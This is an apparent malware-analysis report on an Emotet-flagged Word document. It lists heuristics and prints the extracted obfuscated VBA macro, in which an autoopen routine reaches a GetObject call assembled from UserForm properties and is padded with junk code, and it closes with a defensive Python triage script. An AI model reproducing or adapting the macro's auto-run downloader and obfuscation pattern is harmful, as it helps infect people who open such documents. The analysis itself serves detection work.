Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
ClamAV identifies the file as malicious with the signature Doc.Downloader.Emotet-6916021-0. Static analysis recovered VBA macros, including an autoopen entry point that calls a second procedure containing a GetObject call, so code runs as soon as the document is opened with macros enabled. The GetObject argument is not a literal string: it is concatenated at run time from UserForm control properties (the .Text and .ControlTipText of a control on the acU_wXDB form plus a member of the FAGXUAQA form; both modules carry the GUID-style VB_Base attributes of forms in the preview), which keeps the real target out of the macro text that olevba extracts. The rest of the visible code is padding: nonsense arithmetic inside comparisons between undefined variables and always-true checks such as If 44628 = 44628, all under On Error Resume Next so that the junk never raises. This is consistent with an Emotet maldoc whose macro acts as a downloader for a second-stage payload; the target string itself is not visible in the previewed source. Two caveats on the heuristics below: the only extracted URL is the standard Office Open XML DrawingML namespace identifier and carries no signal, and the legacy WordBasic finding states that no modern VBA project was recovered, which the extracted macros.bas contradicts, so it adds nothing beyond the AutoOpen finding.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6916021-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6916021-0
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard Office Open XML DrawingML namespace identifier, not a download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24415 bytes | 8ac3715168a56f9fde930c7b380282d24bd1c2cb572ff05d88542e034a273f65 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "QAXAUAQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "acU_wXDB"
Attribute VB_Base = "0{4FCED8B7-30FC-4ED9-A1E7-1F401687FD9E}{78F889BA-9E36-47E5-A472-6210A96358E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "FAGXUAQA"
Attribute VB_Base = "0{3DE04CE5-B0B0-4846-9C33-5EE74FC586C2}{858E5775-70DD-4A6D-B2E8-2266E10C1C0B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
If UAoDAXQX = vADA4c Then
Set wADwD4Zo = iAZAAoXZ
oXABxAC = tAGAAD4 - 505055942 - 168268245 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw + jAAQcDA / Tan(178843477))) * (722570223 + Sgn(375321897 / Sin(vAAAD1xC)))
Set wCAAXA = zCCAAQ
End If
If qZccBA = VBAQXA_k Then
Set r4DUxDw = fDUxAABC
kAUAwD = PwxA4A - 718307864 - 952430164 + Log(455767000 - Atn(ZAAkXk / cAQ4UXcU + XBAQCAw / Tan(924078672))) * (298640277 + Sgn(738034148 / Sin(sQQBQw)))
Set KAQGCX = RkAAAQc
End If
End Function
Function zAAAAUAw()
If hAGUUQA = MAXUAwDx Then
Set wQUAoxGZ = JGUQBA
wAw4AA = FZAQAUAB - 284219250 - 817125947 + Log(257052538 - Atn(kU1AwBBA / PQAAAG + YowAX_ / Tan(246632403))) * (840841142 + Sgn(793654468 / Sin(YADXAAQC)))
Set RAwGDAc = fAAQQ4B
End If
If Q1BUACA = H4oDBX Then
Set uX4BoDA = jCwC1xUQ
rAZBAAA = jAD_AcAo - 555087613 - 23826184 + Log(431821409 - Atn(QA1AAAB / pAU_wUA + jxA_AQ_ / Tan(973340830))) * (953480254 + Sgn(478078400 / Sin(bAZ1xQ1k)))
Set YAADQAQQ = tZACkB
End If
If j4ADACQA = RA1XAAB Then
Set EkZwA4 = LAAA_C
WQDDDAA = rDxDAAQ - 571512356 - 510268391 + Log(206464688 - Atn(VAAUUB / WocxB4 + OAD_AAc / Tan(256286743))) * (29559814 + Sgn(848300119 / Sin(v_CAUZx1)))
Set SXAACCD = WQA1ABkG
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
If KA4GwZAx = rAXk_AAo Then
Set j41CGC = J4BZX_
MBBQoBZc = vcCAAUB - 368973020 - 110878762 + Log(596488084 - Atn(z1AAB_w / kAGDC1G + G1BXxo / Tan(251480417))) * (522235078 + Sgn(862993557 / Sin(qDAABo1A)))
Set BAAoXXAB = sAA_AA
End If
If FXDQCAx = zAxcX4cA Then
Set NCQGAUcQ = sAD44AA
nAABADAG = dUQAcX - 470963566 - 560500095 + Log(512986172 - Atn(zQAUCk / TAQcUDU + KABUBA / Tan(27841163))) * (919408799 + Sgn(99276263 / Sin(VkUQQQ)))
Set f_UwGAA = mAwAcD
End If
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
If lAkAAkBk = q_1_4Z Then
Set NGAZwD = MAABBD
VAkAAAB = IxAAA4AA - 712660577 - 448959432 + Log(325920443 - Atn(Ax4woU / fAwAA1 + Y4BU4DD / Tan(424755303))) * (775049975 + Sgn(433238418 / Sin(OBAAAX)))
Set rZAAAU = wBA1UA
End If
If wcxZU1 = mBZBAQ4 Then
Set UUAQAX4 = tcAQADAA
iDAGQAD = IUQZ1A - 985433666 - 974070461 + Log(272105171 - Atn(qADAUA / cUADDwCB + aDAZ4A / Tan(592446402))) * (361723672 + Sgn(462940403 / Sin(CkQUZQA)))
Set OCDUA4k = OABUCQX
End If
If 44628 = 44628 Then
If j4AGGA = EA_BAxXA Then
Set AAxwAAw = ZA4AAADA
GBUwAA = SADAGDA - 536367155 - 787462622 + Log(197038824 - Atn(q_AAAGZX / pCkDoQ4C + cooAUA / Tan(595061147))) * (498456042 + Sgn(721229599 / Sin(IGkAGA)))
Set DBAAQ4 = dXAABAA
End If
If jUAGAQx = HAAcw4x Then
Set cZADA4AD = j_DQAC
BxAZoo_A = IGAkDA_B - 261462350 - 616511046 + Log(655718205 - Atn(IxQBAQBB / fxckx4 + FAwAk_Z / Tan(363086683))) * (25956024 + Sgn(321724842 / Sin(PA_AAZD1)))
Set PDkAAkkw = sxBBQAoA
End If
If CQAZCx = moxkDBx_ Then
Set sDxAAAAX = ZQZAXAww
iU4cUoC = cAGQCA - 845238247 - 325819389 + Log(703240359 - Atn(DAUAAcU / fAAokk__ + JDwkAQA / Tan(223797623))) * (5233956
... (truncated)
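The AutoOpen and GetObject findings above can be reproduced on the extracted macros.bas with a few lines of static triage, and the same pass surfaces two details the heuristic list does not spell out: the call chain from the autoopen entry point into the procedure that calls GetObject, and the fact that the GetObject argument is read from UserForm control properties rather than written as a string. The following Python script is an added example written for this report, not the analyzer's own implementation. SAMPLE_VBA is a constructed, condensed copy of the relevant lines from the preview (the arithmetic padding is cut down) so that the script runs offline; the function names, the AUTO_EXEC and EXEC_PRIMITIVES lists and the regular expressions are this example's own choices.

```python
"""Static triage of an extracted VBA module: auto-exec entry points, the
procedures they reach, and the execution primitives those procedures call.
Added example for this report, not the analyzer's code."""
import re

# Constructed sample: a condensed copy of the relevant lines of macros.bas
# from the preview above, with most of the arithmetic padding removed.
SAMPLE_VBA = r'''
Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
If UAoDAXQX = vADA4c Then
oXABxAC = tAGAAD4 - 505055942 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw))
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
If 44628 = 44628 Then
Set sDxAAAAX = ZQZAXAww
End If
End Function
'''

# Procedure names Word and Excel run without user interaction (example list).
AUTO_EXEC = {"autoopen", "autoexec", "autoclose", "auto_open", "auto_close",
             "document_open", "document_close", "workbook_open", "workbook_close"}
# Calls that hand control to something outside the VBA runtime (example list).
EXEC_PRIMITIVES = ("GetObject", "CreateObject", "Shell", "ShellExecute")
# UserForm control properties commonly used to keep strings out of the source.
CONTROL_PROPS = ("Text", "Caption", "Tag", "ControlTipText", "Value")

PROC_START = re.compile(r"\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
PROC_END = re.compile(r"\s*End\s+(?:Sub|Function)\b", re.I)
OPAQUE_IF = re.compile(r"\bIf\s+(\d+)\s*=\s*(\d+)\s+Then", re.I)
CTRL_PROP = re.compile(r"\b\w+\.\w+\.(" + "|".join(CONTROL_PROPS) + r")\b", re.I)


def split_procedures(src):
    """Map procedure name -> body text (the lines between Sub/Function and End)."""
    procs, name, body = {}, None, []
    for line in src.splitlines():
        start = PROC_START.match(line)
        if start:
            name, body = start.group(1), []
        elif PROC_END.match(line) and name:
            procs[name] = "\n".join(body)
            name = None
        elif name:
            body.append(line)
    return procs


def callees(body, proc_names, self_name):
    """Other procedures referenced from body by bare name (VBA calls need no parens)."""
    return [n for n in proc_names
            if n != self_name
            and re.search(r"(?<![\w.])" + re.escape(n) + r"(?!\w)", body, re.I)]


def exec_chains(procs):
    """For each auto-exec entry point, walk its call graph and record every
    execution primitive reached together with the path that reaches it."""
    chains = {}
    for entry in procs:
        if entry.lower() not in AUTO_EXEC:
            continue
        hits, seen, stack = [], set(), [(entry, [entry])]
        while stack:
            cur, path = stack.pop()
            if cur in seen:
                continue
            seen.add(cur)
            body = procs[cur]
            for prim in EXEC_PRIMITIVES:
                if re.search(r"\b" + prim + r"\s*\(", body, re.I):
                    hits.append((prim, "->".join(path)))
            for callee in callees(body, procs, cur):
                stack.append((callee, path + [callee]))
        chains[entry] = hits
    return chains


def opaque_predicates(src):
    """Always-true numeric comparisons used as padding, e.g. If 44628 = 44628 Then."""
    return [m.group(0) for m in OPAQUE_IF.finditer(src) if m.group(1) == m.group(2)]


def control_property_sources(procs):
    """UserForm control properties read inside procedures: strings stored on
    form objects instead of in the source that olevba extracts."""
    return sorted({m.group(1) for body in procs.values() for m in CTRL_PROP.finditer(body)})


def triage(src):
    procs = split_procedures(src)
    return {
        "procedures": sorted(procs),
        "entry_points": sorted(n for n in procs if n.lower() in AUTO_EXEC),
        "exec_chains": exec_chains(procs),
        "opaque_predicates": opaque_predicates(src),
        "string_sources": control_property_sources(procs),
    }


def verdict(report):
    """Suspicious when an auto-exec entry point reaches an execution primitive."""
    return "suspicious" if any(report["exec_chains"].values()) else "no-autoexec-path"


if __name__ == "__main__":
    rep = triage(SAMPLE_VBA)
    for key, value in rep.items():
        print(f"{key}: {value}")
    print("verdict:", verdict(rep))
```

On the sample this reports the single entry point autoopen, the chain autoopen->m1CQQA ending in GetObject, one opaque predicate, and Text and ControlTipText as the properties feeding the GetObject argument. The last item is the practical lead: to recover the real target you dump the UserForm streams (the o/f streams of the acU_wXDB and FAGXUAQA modules) rather than searching the VBA source for a URL, which is why the only URL the analyzer extracted is a schema namespace.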